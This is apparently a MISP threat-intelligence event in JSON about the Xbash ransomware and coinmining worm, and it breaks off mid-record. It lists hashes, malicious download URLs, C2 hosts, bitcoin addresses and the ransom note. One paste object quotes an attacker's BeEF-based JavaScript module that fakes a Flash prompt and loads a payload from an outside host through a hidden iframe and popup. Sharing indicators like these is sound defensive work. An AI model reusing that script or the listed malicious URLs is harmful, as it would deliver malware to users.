{ "Event": { "analysis": "2", "date": "2018-09-19", "extends_uuid": "", "info": "OSINT (expanded) - Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows", "publish_timestamp": "1537334515", "published": true, "threat_level_id": "3", "timestamp": "1537334496", "uuid": "5ba1d01f-27cc-438f-9cbc-4652950d210f", "Orgc": { "name": "CIRCL", "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f" }, "Tag": [ { "colour": "#a200ca", "name": "ms-caro-malware:malware-platform=\"Python\"" }, { "colour": "#ffffff", "name": "tlp:white" }, { "colour": "#00223b", "name": "osint:source-type=\"blog-post\"" }, { "colour": "#0088cc", "name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Exploit Public-Facing Application - T1190\"" }, { "colour": "#0088cc", "name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Standard Application Layer Protocol - T1071\"" }, { "colour": "#0088cc", "name": "misp-galaxy:tool=\"Xbash\"" }, { "colour": "#0088cc", "name": "misp-galaxy:threat-actor=\"Iron Group\"" } ], "Attribute": [ { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1537333842", "to_ids": false, "type": "link", "uuid": "5ba1d038-785c-41d2-8712-4c5d950d210f", "value": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/", "Tag": [ { "colour": "#00223b", "name": "osint:source-type=\"blog-post\"" } ] }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1537333843", "to_ids": false, "type": "text", "uuid": "5ba1d04d-25a0-455c-9ee7-45f3950d210f", "value": "Unit 42 researchers have found a new malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks.\r\n\r\nXbash has ransomware and coinmining capabilities. 
It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya). It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations\u2019 network (again, much like WannaCry or Petya/NotPetya).\r\n\r\nXbash spreads by attacking weak passwords and unpatched vulnerabilities.\r\n\r\nXbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find no functionality within Xbash that would enable restoration after the ransom is paid. This means that, similar to NotPetya, Xbash is data destructive malware posing as ransomware.\r\n\r\nOrganizations can protect themselves against Xbash by:\r\n\r\n Using strong, non-default passwords\r\n Keeping up-to-date on security updates\r\n Implementing endpoint security on Microsoft Windows and Linux systems\r\n Preventing access to unknown hosts on the internet (to prevent access to command and control servers)\r\n Implementing and maintaining rigorous and effective backup and restoration processes and procedures.\r\n\r\nPalo Alto Networks customers are protected against Xbash as outlined at the end of this post.\r\n\r\nBelow are some more specifics on Xbash\u2019s capabilities:\r\n\r\n It combines botnet, coinmining, ransomware and self-propagation\r\n It targets Linux-based systems for its ransomware and botnet capabilities\r\n It targets Microsoft Windows-based systems for its coinmining and self-propagating capabilities\r\n The ransomware component targets and deletes Linux-based databases\r\n To date, we have observed 48 incoming transactions to these wallets with total income of about 0.964 bitcoins meaning 48 victims have paid about US $6,000 total (at the time of this writing)\r\n However, we see no evidence that the paid ransoms have resulted in recovery for the victims\r\n In fact, we can find no evidence of any 
functionality that makes recovery possible through ransom payment.\r\n Our analysis shows this is likely the work of the Iron Group, a group publicly linked to other ransomware campaigns including those that use the Remote Control System (RCS), whose source code was believed to be stolen from the HackingTeam in 2015.", "Tag": [ { "colour": "#00223b", "name": "osint:source-type=\"blog-post\"" } ] }, { "category": "Financial fraud", "comment": "If Xbash successfully logs in to a service including MySQL, MongoDB, and PostgreSQL, it will delete almost all existing databases in the server (except for some databases that stored user login information), create a new database named \u201cPLEASE_READ_ME_XYZ\u201d, and insert a ransom message into table \u201cWARNING\u201d of the new database, as shown in Figure 4 and Figure 5. Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! 
Your DB is Backed up to our servers!If we not received your payment,we will leak your database 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 backupsql@pm.me", "deleted": false, "disable_correlation": false, "timestamp": "1537331367", "to_ids": true, "type": "btc", "uuid": "5ba1d0a7-b470-45ff-ba90-27fb950d210f", "value": "1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1" }, { "category": "Payload delivery", "comment": "zlibx", "deleted": false, "disable_correlation": false, "timestamp": "1537331799", "to_ids": true, "type": "sha256", "uuid": "5ba1d257-f6fc-4740-b3f8-28a2950d210f", "value": "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa" }, { "category": "Payload delivery", "comment": "Xbash", "deleted": false, "disable_correlation": false, "timestamp": "1537331800", "to_ids": true, "type": "sha256", "uuid": "5ba1d258-c978-467b-acc6-28a2950d210f", "value": "0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641" }, { "category": "Payload delivery", "comment": "xapache", "deleted": false, "disable_correlation": false, "timestamp": "1537331800", "to_ids": true, "type": "sha256", "uuid": "5ba1d258-9f30-40cc-b608-28a2950d210f", "value": "dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54" }, { "category": "Payload delivery", "comment": "libhttpd", "deleted": false, "disable_correlation": false, "timestamp": "1537331801", "to_ids": true, "type": "sha256", "uuid": "5ba1d259-3908-490a-947e-28a2950d210f", "value": "5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d" }, { "category": "Payload delivery", "comment": "XbashX", "deleted": false, "disable_correlation": false, "timestamp": "1537331801", "to_ids": true, "type": "sha256", "uuid": "5ba1d259-08f8-485f-ac9b-28a2950d210f", "value": "e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c" }, { "category": "Payload delivery", "comment": "XbashY", "deleted": false, "disable_correlation": false, "timestamp": "1537331801", "to_ids": true, "type": "sha256", "uuid": 
"5ba1d259-24bc-4aed-a9c2-28a2950d210f", "value": "f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc" }, { "category": "Payload delivery", "comment": "rootv2.sh", "deleted": false, "disable_correlation": false, "timestamp": "1537331802", "to_ids": true, "type": "sha256", "uuid": "5ba1d25a-0a94-45e3-a624-28a2950d210f", "value": "dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff" }, { "category": "Payload delivery", "comment": "owerv2.sh", "deleted": false, "disable_correlation": false, "timestamp": "1537331802", "to_ids": true, "type": "sha256", "uuid": "5ba1d25a-3294-4259-ba5a-28a2950d210f", "value": "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d" }, { "category": "Payload delivery", "comment": "rootv2.sh", "deleted": false, "disable_correlation": false, "timestamp": "1537331803", "to_ids": true, "type": "sha256", "uuid": "5ba1d25b-0cd8-42b3-891c-28a2950d210f", "value": "09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885" }, { "category": "Payload delivery", "comment": "r88.sh", "deleted": false, "disable_correlation": false, "timestamp": "1537331803", "to_ids": true, "type": "sha256", "uuid": "5ba1d25b-6a28-48a6-9413-28a2950d210f", "value": "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af" }, { "category": "Payload delivery", "comment": "tt.txt", "deleted": false, "disable_correlation": false, "timestamp": "1537331865", "to_ids": true, "type": "sha256", "uuid": "5ba1d299-3438-4286-a1ad-4737950d210f", "value": "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8" }, { "category": "Payload delivery", "comment": "tg.jpg", "deleted": false, "disable_correlation": false, "timestamp": "1537331866", "to_ids": true, "type": "sha256", "uuid": "5ba1d29a-7290-41ea-bdb1-4f76950d210f", "value": "31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78" }, { "category": "Payload delivery", "comment": "reg9.sct", "deleted": false, "disable_correlation": false, "timestamp": 
"1537331866", "to_ids": true, "type": "sha256", "uuid": "5ba1d29a-b8e8-46d8-b9c5-4381950d210f", "value": "725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054" }, { "category": "Payload delivery", "comment": "m.png", "deleted": false, "disable_correlation": false, "timestamp": "1537331867", "to_ids": true, "type": "sha256", "uuid": "5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f", "value": "d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6" }, { "category": "Payload delivery", "comment": "tmp.jpg", "deleted": false, "disable_correlation": false, "timestamp": "1537331867", "to_ids": true, "type": "sha256", "uuid": "5ba1d29b-1d08-4090-82a2-47f7950d210f", "value": "ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332429", "to_ids": true, "type": "url", "uuid": "5ba1d4cd-2424-40e7-a047-48a4950d210f", "value": "http://3g2upl4pq6kufc4m.tk/zlibx" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332429", "to_ids": true, "type": "url", "uuid": "5ba1d4cd-aaa0-4f57-93b1-4771950d210f", "value": "http://e3sas6tzvehwgpak.tk/XbashY" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332430", "to_ids": true, "type": "url", "uuid": "5ba1d4ce-484c-4c15-8ce5-4d5f950d210f", "value": "http://3g2upl4pq6kufc4m.tk/XbashY" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332430", "to_ids": true, "type": "url", "uuid": "5ba1d4ce-5a48-4f70-91c6-4ce9950d210f", "value": "http://3g2upl4pq6kufc4m.tk/xapache" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332430", "to_ids": true, "type": "url", 
"uuid": "5ba1d4ce-db6c-4068-8334-4a3b950d210f", "value": "http://3g2upl4pq6kufc4m.tk/libhttpd" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332431", "to_ids": true, "type": "url", "uuid": "5ba1d4cf-b984-4242-bafc-49d0950d210f", "value": "http://xmr.enjoytopic.tk/l/rootv2.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332431", "to_ids": true, "type": "url", "uuid": "5ba1d4cf-0f64-408b-8b8d-42a0950d210f", "value": "http://xmr.enjoytopic.tk/l2/rootv2.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332432", "to_ids": true, "type": "url", "uuid": "5ba1d4d0-bddc-4521-814d-473c950d210f", "value": "http://xmr.enjoytopic.tk/l/r88.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332432", "to_ids": true, "type": "url", "uuid": "5ba1d4d0-1d8c-424a-b2d8-4430950d210f", "value": "http://xmr.enjoytopic.tk/12/r88.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332433", "to_ids": true, "type": "url", "uuid": "5ba1d4d1-1698-491d-a555-4331950d210f", "value": "http://e3sas6tzvehwgpak.tk/lowerv2.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332433", "to_ids": true, "type": "url", "uuid": "5ba1d4d1-2518-4b2f-be8f-46e4950d210f", "value": "http://3g2upl4pq6kufc4m.tk/r88.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332434", "to_ids": true, "type": "url", "uuid": "5ba1d4d2-1cd0-4dbb-bb96-444e950d210f", "value": "http://e3sas6tzvehwgpak.tk/XbashX" }, { "category": 
"Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332434", "to_ids": true, "type": "url", "uuid": "5ba1d4d2-98dc-4ef9-a073-4449950d210f", "value": "http://png.realtimenews.tk/m.png" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332434", "to_ids": true, "type": "url", "uuid": "5ba1d4d2-39ec-4b98-ae74-42bb950d210f", "value": "http://daknobcq4zal6vbm.tk/tt.txt" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332435", "to_ids": true, "type": "url", "uuid": "5ba1d4d3-4da0-43c6-a073-4820950d210f", "value": "http://d3goboxon32grk2l.tk/reg9.sct" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332467", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f", "value": "ejectrift.censys.xyz" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332467", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f3-ba24-4602-99bb-43fc950d210f", "value": "scan.censys.xyz" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332468", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f4-fa84-48bf-a1b9-49b8950d210f", "value": "api.leakingprivacy.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332468", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f4-9b88-4f01-a225-42c6950d210f", "value": "news.realnewstime.xyz" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, 
"timestamp": "1537332468", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f", "value": "scan.realnewstime.xyz" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332469", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f5-3b08-406a-8ad7-42cb950d210f", "value": "news.realtimenews.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332469", "to_ids": true, "type": "domain", "uuid": "5ba1d4f5-50fc-4482-9ed4-4360950d210f", "value": "scanaan.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332470", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f6-5598-4a65-8dd5-44ff950d210f", "value": "scan.3g2upl4pq6kufc4m.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332470", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f6-4230-4c9b-80fe-4167950d210f", "value": "scan.vfk2k5s5tfjr27tz.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332471", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f", "value": "scan.blockbitcoin.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332471", "to_ids": true, "type": "domain", "uuid": "5ba1d4f7-66f4-4d3f-ae76-40a8950d210f", "value": "blockbitcoin.com" }, { "category": "Network activity", "comment": "IPs for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332488", "to_ids": true, "type": "ip-dst", "uuid": "5ba1d508-02d8-44e3-a778-27c3950d210f", 
"value": "142.44.215.177" }, { "category": "Network activity", "comment": "IPs for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332489", "to_ids": true, "type": "ip-dst", "uuid": "5ba1d509-5e58-4d73-bd76-27c3950d210f", "value": "144.217.61.147" }, { "category": "Network activity", "comment": "URLs for C2 Domain Updating", "deleted": false, "disable_correlation": false, "timestamp": "1537332511", "to_ids": true, "type": "url", "uuid": "5ba1d51f-5344-4ba2-ae31-4bea950d210f", "value": "https://pastebin.com/raw/Xu74Mzif" }, { "category": "Network activity", "comment": "URLs for C2 Domain Updating", "deleted": false, "disable_correlation": false, "timestamp": "1537332511", "to_ids": true, "type": "url", "uuid": "5ba1d51f-d130-4d8f-a046-4e27950d210f", "value": "https://pastebin.com/raw/rBHjTZY6" }, { "category": "Financial fraud", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1537332542", "to_ids": true, "type": "btc", "uuid": "5ba1d53e-c4bc-4bf0-8245-4a22950d210f", "value": "1Kss6v4eSUgP4WrYtfYGZGDoRsf74M7CMr" }, { "category": "Financial fraud", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1537332542", "to_ids": true, "type": "btc", "uuid": "5ba1d53e-b274-4731-abbb-4920950d210f", "value": "1ExbdpvKJ6M1t5KyiZbnzsdQ63SEsY6Bff" }, { "category": "Payload delivery", "comment": "Email Addresses in Ransom Messages", "deleted": false, "disable_correlation": false, "timestamp": "1537332575", "to_ids": true, "type": "email-dst", "uuid": "5ba1d55f-2fcc-49ac-b905-4e51950d210f", "value": "backupsql@protonmail.com" }, { "category": "Payload delivery", "comment": "Email Addresses in Ransom Messages", "deleted": false, "disable_correlation": false, "timestamp": "1537332576", "to_ids": true, "type": "email-dst", "uuid": "5ba1d560-0e08-460b-9909-480b950d210f", "value": "backupsql@pm.me" }, { "category": "Payload delivery", "comment": "Email Addresses in Ransom Messages", "deleted": 
false, "disable_correlation": false, "timestamp": "1537332576", "to_ids": true, "type": "email-dst", "uuid": "5ba1d560-2538-43e3-8bb2-4d1f950d210f", "value": "backupdatabase@pm.me" } ], "Object": [ { "comment": "", "deleted": false, "description": "Paste or similar post from a website allowing to share privately or publicly posts.", "meta-category": "misc", "name": "paste", "template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12", "template_version": "4", "timestamp": "1537332652", "uuid": "5ba1d5ac-1460-4ba2-9ff1-458e950d210f", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "paste", "timestamp": "1537332652", "to_ids": false, "type": "text", "uuid": "5ba1d5ac-4b4c-486a-88ee-4b38950d210f", "value": "scan.vfk2k5s5tfjr27tz.tk\r\nscan.blockbitcoin.tkh" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "username", "timestamp": "1537332652", "to_ids": false, "type": "text", "uuid": "5ba1d5ac-4dd0-4d93-b667-4d80950d210f", "value": "wfkfly" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "origin", "timestamp": "1537332653", "to_ids": false, "type": "text", "uuid": "5ba1d5ad-9e90-4225-99a2-4679950d210f", "value": "pastebin.com" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "url", "timestamp": "1537332653", "to_ids": true, "type": "url", "uuid": "5ba1d5ad-17d8-4d8b-8b63-4f23950d210f", "value": "https://pastebin.com/raw/Xu74Mzif" } ] }, { "comment": "", "deleted": false, "description": "Paste or similar post from a website allowing to share privately or publicly posts.", "meta-category": "misc", "name": "paste", "template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12", "template_version": "4", "timestamp": "1537332746", "uuid": "5ba1d60a-9f28-434d-b03a-4b86950d210f", "Attribute": [ { "category": "Other", "comment": "", 
"deleted": false, "disable_correlation": false, "object_relation": "paste", "timestamp": "1537332746", "to_ids": false, "type": "text", "uuid": "5ba1d60a-82f8-486e-99d5-4580950d210f", "value": "142.44.215.177\r\n144.217.61.147" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "username", "timestamp": "1537332747", "to_ids": false, "type": "text", "uuid": "5ba1d60b-7de0-4efe-bb0b-44ca950d210f", "value": "wfkfly" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "origin", "timestamp": "1537332747", "to_ids": false, "type": "text", "uuid": "5ba1d60b-8bb8-4e7a-a466-40fc950d210f", "value": "pastebin.com" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "url", "timestamp": "1537332747", "to_ids": true, "type": "url", "uuid": "5ba1d60b-8930-46d0-a00b-4dc6950d210f", "value": "https://pastebin.com/raw/rBHjTZY6" } ] }, { "comment": "", "deleted": false, "description": "Paste or similar post from a website allowing to share privately or publicly posts.", "meta-category": "misc", "name": "paste", "template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12", "template_version": "4", "timestamp": "1537332851", "uuid": "5ba1d673-e378-45e9-9d50-41c6950d210f", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "paste", "timestamp": "1537332851", "to_ids": false, "type": "text", "uuid": "5ba1d673-8450-46fa-bc4e-4243950d210f", "value": "//\r\n// Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net\r\n// Browser Exploitation Framework (BeEF) - http://beefproject.com\r\n// See the file 'doc/COPYING' for copying permission\r\n//\r\n\r\n // Module Configurations\r\nvar image = \"http://d20blzxlz9ydha.cloudfront.net/flash.png\";\r\nvar payload_type = \"Custom_Payload\";\r\nvar payload_uri = 
\"http://update.pythonanywhere.com/d\";\r\n\r\n//var beef_root = beef.net.httpproto + \"://\" + beef.net.host + \":\" + beef.net.port;\r\nvar payload = \"\";\r\n\r\n// Function to gray out the screen\r\nvar grayOut = function(vis, options) {\r\nvar options = options || {};\r\nvar zindex = options.zindex || 50;\r\nvar opacity = options.opacity || 70;\r\nvar opaque = (opacity / 100);\r\nvar bgcolor = options.bgcolor || '#000000';\r\nvar dark=document.getElementById('darkenScreenObject');\r\nif (!dark) {\r\n var tbody = document.getElementsByTagName(\"body\")[0];\r\n var tnode = document.createElement('div');\r\n tnode.style.position='absolute';\r\n tnode.style.top='0px';\r\n tnode.style.left='0px';\r\n tnode.style.overflow='hidden';\r\n tnode.style.display='none';\r\n tnode.id='darkenScreenObject';\r\n tbody.appendChild(tnode);\r\n dark=document.getElementById('darkenScreenObject');\r\n}\r\nif (vis) {\r\n var pageWidth='100%';\r\n var pageHeight='100%';\r\n dark.style.opacity=opaque;\r\n dark.style.MozOpacity=opaque;\r\n dark.style.filter='alpha(opacity='+opacity+')';\r\n dark.style.zIndex=zindex;\r\n dark.style.backgroundColor=bgcolor;\r\n dark.style.width= pageWidth;\r\n dark.style.height= pageHeight;\r\n dark.style.display='block';\r\n} else {\r\n dark.style.display='none';\r\n}\r\n};\r\n\r\n\r\n// Payload Configuration\r\nswitch (payload_type) {\r\n\tcase \"Custom_Payload\":\r\n\t payload = payload_uri;\r\n\tbreak;\r\n\tcase \"Firefox_Extension\":\r\n\t //payload = beef_root + \"/api/ipec/ff_extension\";\r\n\t break;\r\n\tdefault:\r\n\t //beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');\r\n\t break;\r\n}\r\n\r\n// Create DIV\r\nvar flashdiv = document.createElement('div');\r\nflashdiv.setAttribute('id', 'flashDiv');\r\nflashdiv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');\r\nflashdiv.setAttribute('align', 'center');\r\nvar id = setInterval(frame, 100);\r\nfunction frame() {\r\n\tif 
(document.body.appendChild(flashdiv)) {\r\n\t\t// window.open is very useful when using data URI vectors and the IFrame/Object tag\r\n\t\t// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.\r\n\t\tflashdiv.innerHTML = \"\";\r\n\r\n\t\t// gray out the background\r\n\t\tgrayOut(true,{'opacity':'30'});\r\n\r\n\t\t// clean up on click\r\n\t\tdocument.getElementById(\"flashDiv\").onclick = function(){\r\n\t\t\tdocument.body.removeChild(flashdiv);\r\n\t\t\tgrayOut(false,{'opacity':'0'});\r\n\t\t\tdocument.body.removeChild(document.getElementById('darkenScreenObject'));\r\n\t\t\taa=window.open(\"http://dzebppteh32lz.cloudfront.net/c\",'popUpWindow','height=1,width=1,top=0,left=0,resizable=no,scrollbars=no,toolbar=no,menubar=no,location=no,directories=no,status=no')\r\n\t\t\t//aa=window.openwindow.open(\"http://d3lvemwrafj7a7.cloudfront.net/e\",'_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000, top=10000, width=10, height=10', ''); \r\n\t\t\taa.moveTo(10000,10000);\r\n\t\t\t//window.open(\"http://update.pythonanywhere.com/d\");\r\n\t\t\tvar iframe = document.createElement('iframe');\r\n\t\t\tiframe.style.display = \"none\";\r\n\t\t\tiframe.src = \"http://update.pythonanywhere.com/d\";\r\n\t\t\tdocument.body.appendChild(iframe);\r\n\t\t\t\r\n\t\t}\r\n\t clearInterval(id);\r\n\t} \r\n}" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "username", "timestamp": "1537332852", "to_ids": false, "type": "text", "uuid": "5ba1d674-5500-4354-b426-4bad950d210f", "value": "wfkfly" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "origin", "timestamp": "1537332852", "to_ids": false, "type": "text", "uuid": "5ba1d674-e264-47fd-a089-449e950d210f", "value": "pastebin.com" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "url", 
"timestamp": "1537332852", "to_ids": true, "type": "url", "uuid": "5ba1d674-f124-48c8-95ff-4bb8950d210f", "value": "https://pastebin.com/raw/AbhwC1Ki" } ] }, { "comment": "", "deleted": false, "description": "Paste or similar post from a website allowing to share privately or publicly posts.", "meta-category": "misc", "name": "paste", "template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12", "template_version": "4", "timestamp": "1537332942", "uuid": "5ba1d6ce-de54-4d15-8134-27c3950d210f", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "paste", "timestamp": "1537332942", "to_ids": false, "type": "text", "uuid": "5ba1d6ce-d1e4-4362-a7ac-27c3950d210f", "value": "https://daknobcq4zal6vbm.tk/m.exe;" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "username", "timestamp": "1537332943", "to_ids": false, "type": "text", "uuid": "5ba1d6cf-498c-4df8-b61f-27c3950d210f", "value": "wfkfly" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "origin", "timestamp": "1537332943", "to_ids": false, "type": "text", "uuid": "5ba1d6cf-7928-4e3e-9e52-27c3950d210f", "value": "pastebin.com" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "url", "timestamp": "1537332943", "to_ids": true, "type": "url", "uuid": "5ba1d6cf-6ac4-4e0e-a8e7-27c3950d210f", "value": "https://pastebin.com/R5q9wvHw" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334462", "uuid": "9fb96957-5ea7-449a-bbd2-ff71922b5a6e", "ObjectReference": [ { "comment": "", "object_uuid": "9fb96957-5ea7-449a-bbd2-ff71922b5a6e", "referenced_uuid": 
"7c26518e-fa7a-453f-a4cd-e234d2520d3e", "relationship_type": "analysed-with", "timestamp": "1537334494", "uuid": "5ba1dcde-8d08-47a7-a596-4bfb02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334459", "to_ids": true, "type": "md5", "uuid": "2dfc435d-b4df-4555-a431-9b756457575d", "value": "33357485c5c92f087bd53602d6d8a48b" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334460", "to_ids": true, "type": "sha1", "uuid": "04f77f08-d1ab-442e-bd14-ed4935e7e9fa", "value": "7403a54aa5ff712a8614e6a90398322d5fa7ba89" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334460", "to_ids": true, "type": "sha256", "uuid": "25172f79-b5d8-4ba0-8f65-157f7a90fce8", "value": "5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334461", "uuid": "7c26518e-fa7a-453f-a4cd-e234d2520d3e", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334461", "to_ids": false, "type": "datetime", "uuid": "cbf68cfc-a53a-4a67-b043-d514ef6c251a", "value": "2018-09-18T19:28:42" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334461", "to_ids": false, "type": "link", "uuid": "d17c47a6-5c9e-4b65-97a1-ecd5dd083c82", "value": "https://www.virustotal.com/file/5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d/analysis/1537298922/" }, { 
